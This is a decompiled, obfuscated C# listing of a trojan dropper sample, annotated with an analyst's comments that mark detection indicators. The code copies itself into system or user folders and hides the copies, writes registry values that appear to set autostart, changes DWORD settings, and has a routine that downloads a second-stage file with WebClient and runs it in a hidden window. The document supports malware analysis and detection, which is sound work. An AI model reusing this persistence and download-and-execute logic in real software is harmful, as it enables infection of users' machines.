// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
using \u0001;
using \u0008;
using \u000E;
using \u000F;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Runtime.InteropServices;
using System.Threading;
namespace \u000E
{
  // Analyst notes on this decompiled type.
  //
  // Every identifier was renamed by an obfuscator to a control-character escape, and several
  // members share the same name (three fields below are all called \u0001). The listing is
  // therefore useful for reading behaviour, not for recompiling.
  //
  // NOTE(review): \u0005.\u0001(int) is called with an integer constant wherever a string is
  // needed (registry key paths, value names, path pieces, an environment-variable name). It is
  // presumably an indexed lookup into an encoded string table; the decoded strings are not on
  // this page, so every key, value and file name below is unknown until that table is recovered.
  //
  // NOTE(review): \u000F.\u0001.\u0001 is read as a configuration holder (mutex name, target file
  // names, registry value names, two boolean switches); its definition is not in this listing.
  internal sealed class \u0005
  {
    // Static field of the obfuscated type \u0002; not assigned anywhere in this class.
    [NonSerialized]
    internal static \u0002 \u0001;
    // Named mutex used by \u0011() as the single-instance marker.
    private Mutex \u0001;
    // Instance of the obfuscated type \u0002, created with the object.
    private \u0002 \u0001 = new \u0002();

    // Start-up sequence, in order: instance check (\u0011), registry DWORD writes (\u0013),
    // install step (\u0012), then \u000F() on a field and a worker thread running \u0010.
    // \u0012 calls Environment.Exit(0) unless this.\u000F() reports true for every configured
    // path, so the last two statements only run in a process that found both copies in place.
    public void \u000F()
    {
      this.\u0011();
      this.\u0013();
      this.\u0012();
      // presumably the \u0002-typed field (Mutex has no such member); what it starts is not visible here
      this.\u0001.\u000F();
      // IsBackground is never set, so this is a foreground thread and keeps the process alive.
      new Thread(new ThreadStart(\u0005.\u0010)).Start();
    }

    // Worker loop: every 10 ms it hands the current Process object to \u0005.\u000F(Process),
    // swallowing every exception, and never terminates.
    // NOTE(review): no \u000F overload taking a Process appears in this listing (only the
    // parameterless and the string overloads), so the purpose of the call cannot be determined
    // from this page.
    public static void \u0010()
    {
      // The opened HKCU key (path from the string table) is discarded: never read, never disposed.
      Registry.CurrentUser.OpenSubKey(\u0005.\u0001(3716));
      while (true)
      {
        try
        {
          \u0005.\u000F(Process.GetProcessById(Process.GetCurrentProcess().Id));
          Thread.Sleep(10);
        }
        catch
        {
        }
      }
    }

    // Single-instance check built on a named mutex whose name comes from configuration.
    // Per documented Mutex semantics, new Mutex(true, name) does not throw when the name already
    // exists; it returns without ownership, and ReleaseMutex() then throws because the calling
    // thread is not the owner. The catch turns that into a silent exit of the second instance.
    // For responders: the mutex name is a stable host indicator once the configuration is decoded.
    private void \u0011()
    {
      try
      {
        this.\u0001 = new Mutex(true, \u000F.\u0001.\u0001.\u0003);
        this.\u0001.ReleaseMutex();
      }
      catch
      {
        Environment.Exit(0);
      }
    }

    // Install step: copies the running executable to two configured locations, marks the copies
    // hidden, writes the quoted copy paths into two registry keys, launches the copies with a
    // hidden window and exits the current process.
    //
    // Observable artefacts for detection and clean-up (names depend on the undecoded config):
    //   - a process copying its own image into the System / Common Files folders, or into
    //     %APPDATA% and a second environment-variable directory, then setting FileAttributes.Hidden;
    //   - two registry values whose data is a double-quoted executable path, under HKLM or HKCU;
    //   - child processes started from those paths with ProcessWindowStyle.Hidden.
    private void \u0012()
    {
      string fileName = Process.GetCurrentProcess().MainModule.FileName;
      // \u0016 selects machine-wide locations (and HKLM below) versus per-user ones (HKCU).
      // presumably an "elevated / all users" switch — confirm against the config type.
      if (\u000F.\u0001.\u0001.\u0016)
      {
        // string 1971 sits between folder and file name; presumably a path separator
        \u000F.\u0001.\u0001.\u0006[0] = Environment.GetFolderPath(Environment.SpecialFolder.System) + \u0005.\u0001(1971) + \u000F.\u0001.\u0001.\u0004[0];
        \u000F.\u0001.\u0001.\u0006[1] = Environment.GetFolderPath(Environment.SpecialFolder.CommonProgramFiles) + \u0005.\u0001(1971) + \u000F.\u0001.\u0001.\u0004[1];
      }
      else
      {
        \u000F.\u0001.\u0001.\u0006[0] = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0005.\u0001(1971) + \u000F.\u0001.\u0001.\u0004[0];
        // string 3219 names an environment variable; the same variable is the download directory
        // in \u000F(string). Which variable it is cannot be read from this page.
        \u000F.\u0001.\u0001.\u0006[1] = Environment.GetEnvironmentVariable(\u0005.\u0001(3219)) + \u0005.\u0001(1971) + \u000F.\u0001.\u0001.\u0004[1];
      }
      // Nothing to install when the check passes for every target path.
      if (this.\u000F())
        return;
      try
      {
        foreach (string str in \u000F.\u0001.\u0001.\u0006)
        {
          // \u0010(str) is presumably a file-existence test (copy only when it reports false)
          if (!\u000F.\u0001.\u0001.\u0010(str))
            System.IO.File.Copy(fileName, str);
          // Not guarded by the if above: the Hidden attribute is applied to every target path.
          System.IO.File.SetAttributes(str, FileAttributes.Hidden);
        }
      }
      catch
      {
      }
      if (\u000F.\u0001.\u0001.\u0016)
      {
        try
        {
          // Key paths are strings 3773 and 3834, value names come from config, data is the quoted
          // copy path. NOTE(review): a quoted executable path as value data is consistent with
          // autostart (Run-style) entries; confirm by decoding the two key strings.
          Registry.LocalMachine.OpenSubKey(\u0005.\u0001(3773), true).SetValue(\u000F.\u0001.\u0001.\u0005[0], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[0] + (object) '"'));
          Registry.LocalMachine.OpenSubKey(\u0005.\u0001(3834), true).SetValue(\u000F.\u0001.\u0001.\u0005[1], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[1] + (object) '"'));
        }
        catch
        {
        }
      }
      else
      {
        try
        {
          // Same two keys and values as the branch above, written under HKCU instead of HKLM.
          Registry.CurrentUser.OpenSubKey(\u0005.\u0001(3773), true).SetValue(\u000F.\u0001.\u0001.\u0005[0], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[0] + (object) '"'));
          Registry.CurrentUser.OpenSubKey(\u0005.\u0001(3834), true).SetValue(\u000F.\u0001.\u0001.\u0005[1], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[1] + (object) '"'));
        }
        catch
        {
        }
      }
      try
      {
        // The mutex handle is closed before the copies start, so their own \u0011() check can pass.
        this.\u0001.Close();
        foreach (string str in \u000F.\u0001.\u0001.\u0006)
          new Process()
          {
            StartInfo = {
              FileName = str,
              WindowStyle = ProcessWindowStyle.Hidden
            }
          }.Start();
      }
      catch
      {
      }
      // The original image always exits here; execution continues in the copies.
      Environment.Exit(0);
    }

    // Download-and-run: fetches obj0 with WebClient into the directory named by environment
    // variable 3219, under a generated file name, starts it with a hidden window and exits.
    // obj0 is used as the download address as-is; no caller is visible in this listing.
    //
    // The downloaded file is executed with no integrity or signature check visible here.
    // For detection: an outbound WebClient download immediately followed by process creation
    // from that directory, with a file name that differs on every run, so path-based indicators
    // for the second stage are unreliable; the parent/child relationship is the better signal.
    public void \u000F([In] string obj0)
    {
      try
      {
        this.\u0001.Close();
      }
      catch
      {
      }
      try
      {
        // Random.Next(5, 12) yields 5..11 and is passed to a config helper, presumably the length
        // of a random name; string 3210 is appended, presumably a file extension — confirm.
        string str = \u000F.\u0001.\u0001.\u000F(new Random().Next(5, 12)) + \u0005.\u0001(3210);
        new WebClient().DownloadFile(obj0, Environment.GetEnvironmentVariable(\u0005.\u0001(3219)) + \u0005.\u0001(1971) + str);
        new Process()
        {
          StartInfo = {
            FileName = (Environment.GetEnvironmentVariable(\u0005.\u0001(3219)) + \u0005.\u0001(1971) + str),
            WindowStyle = ProcessWindowStyle.Hidden
          }
        }.Start();
      }
      catch
      {
      }
      Environment.Exit(0);
    }

    // Returns true only when \u0010(path) holds for every configured target path, false at the
    // first one for which it does not. Used by \u0012() to decide whether installation is needed.
    private bool \u000F()
    {
      string[] strArray = \u000F.\u0001.\u0001.\u0006;
      for (int index = 0; index < strArray.Length; index++)
      {
        string str = strArray[index];
        if (!\u000F.\u0001.\u0001.\u0010(str))
          return false;
      }
      return true;
    }

    // Writes DWORD values into registry keys whose paths and value names come from the string
    // table: one value under HKCU always, and three more (HKCU twice, HKLM once) when the config
    // switch \u0015 is set. Each write is wrapped in an empty catch, so failures are silent.
    // NOTE(review): setting DWORD flags in HKCU and HKLM ahead of the install step is consistent
    // with changing policy or security settings, but the key names are not visible here;
    // decode strings 3919, 4000, 4009, 4034 and 4111 before concluding what is changed.
    private void \u0013()
    {
      try
      {
        // The data is the decoded string 1896 written as DWord, so it is presumably numeric text.
        Registry.CurrentUser.OpenSubKey(\u0005.\u0001(3919), true).SetValue(\u0005.\u0001(4000), (object) \u0005.\u0001(1896), RegistryValueKind.DWord);
      }
      catch
      {
      }
      // The remaining writes are optional and controlled by configuration.
      if (!\u000F.\u0001.\u0001.\u0015)
        return;
      try
      {
        Registry.CurrentUser.OpenSubKey(\u0005.\u0001(3919), true).SetValue(\u0005.\u0001(4009), (object) \u0005.\u0001(1936), RegistryValueKind.DWord);
      }
      catch
      {
      }
      try
      {
        // Same key path and value name in both hives; the HKLM write is skipped if the HKCU one throws.
        Registry.CurrentUser.OpenSubKey(\u0005.\u0001(4034), true).SetValue(\u0005.\u0001(4111), (object) \u0005.\u0001(1936), RegistryValueKind.DWord);
        Registry.LocalMachine.OpenSubKey(\u0005.\u0001(4034), true).SetValue(\u0005.\u0001(4111), (object) \u0005.\u0001(1936), RegistryValueKind.DWord);
      }
      catch
      {
      }
    }

    // Type initializer: runs \u0003.\u000F() once before first use of this class.
    // presumably sets up the string table read by \u0005.\u0001(int); \u0003 is not in this listing.
    static \u0005() => \u0003.\u000F();
  }
}